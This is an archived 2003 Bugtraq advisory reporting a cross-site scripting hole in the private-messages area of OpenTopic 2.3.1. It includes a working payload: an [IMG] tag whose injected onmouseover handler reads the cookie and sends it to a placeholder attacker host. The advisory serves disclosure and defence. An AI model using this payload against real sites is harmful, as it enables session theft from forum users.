[28367] in bugtraq
OpenTopic security hole
daemon@ATHENA.MIT.EDU (Frog Man)
Sat Jan 4 17:35:51 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 04 Jan 2003 16:20:34 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F85PDK7GC7ZIPzNDGB300009da7@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) -> Cookies recovery
Location/Exploit :
°°°°°°°°°°°°°°°°°°
The XSS hole is in the private messages area (
http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
More details about XSS :
°°°°°°°°°°°°°°°°°°°°°°°°
In French :
http://www.phpsecure.org/article/XSS.php
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.php&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
